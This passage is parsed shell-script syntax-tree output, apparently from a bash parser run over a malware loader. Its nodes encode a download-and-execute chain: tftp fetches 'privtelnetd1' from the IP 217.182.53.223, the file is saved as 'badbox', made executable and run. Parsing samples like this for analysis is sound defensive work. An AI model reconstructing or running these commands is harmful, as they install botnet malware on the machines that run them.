    WordNode(lineno=15, pos=(1641, 1646), word='chmod'),
    WordNode(lineno=15, pos=(1647, 1649), word='+x'),
    WordNode(lineno=15, pos=(1650, 1651), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1651, 1652)),
  CommandNode(lineno=15, pos=(1652, 1660), parts=[
    WordNode(lineno=15, pos=(1652, 1660), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1661, 1800), parts=[
  CommandNode(lineno=16, pos=(1661, 1668), parts=[
    WordNode(lineno=16, pos=(1661, 1663), word='cd'),
    WordNode(lineno=16, pos=(1664, 1668), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1669, 1671)),
  CommandNode(lineno=16, pos=(1672, 1683), parts=[
    WordNode(lineno=16, pos=(1672, 1674), word='cd'),
    WordNode(lineno=16, pos=(1675, 1683), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1684, 1686)),
  CommandNode(lineno=16, pos=(1687, 1694), parts=[
    WordNode(lineno=16, pos=(1687, 1689), word='cd'),
    WordNode(lineno=16, pos=(1690, 1694), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1695, 1697)),
  CommandNode(lineno=16, pos=(1698, 1706), parts=[
    WordNode(lineno=16, pos=(1698, 1700), word='cd'),
    WordNode(lineno=16, pos=(1701, 1706), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1707, 1709)),
  CommandNode(lineno=16, pos=(1710, 1714), parts=[
    WordNode(lineno=16, pos=(1710, 1712), word='cd'),
    WordNode(lineno=16, pos=(1713, 1714), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1714, 1715)),
  CommandNode(lineno=16, pos=(1716, 1755), parts=[
    WordNode(lineno=16, pos=(1716, 1720), word='tftp'),
    WordNode(lineno=16, pos=(1721, 1735), word='217.182.53.223'),
    WordNode(lineno=16, pos=(1736, 1738), word='-c'),
    WordNode(lineno=16, pos=(1739, 1742), word='get'),
    WordNode(lineno=16, pos=(1743, 1755), word='privtelnetd1'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1755, 1756)),
  CommandNode(lineno=16, pos=(1756, 1780), parts=[
    WordNode(lineno=16, pos=(1756, 1759), word='cat'),
    WordNode(lineno=16, pos=(1760, 1772), word='privtelnetd1'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1774, 1780), word='badbox'), pos=(1773, 1780), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1780, 1781)),
  CommandNode(lineno=16, pos=(1781, 1791), parts=[
    WordNode(lineno=16, pos=(1781, 1786), word='chmod'),
    WordNode(lineno=16, pos=(1787, 1789), word='+x'),
    WordNode(lineno=16, pos=(1790, 1791), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1791, 1792)),
  CommandNode(lineno=16, pos=(1792, 1800), parts=[
    WordNode(lineno=16, pos=(1792, 1800), word='./badbox'),
  ]),
])
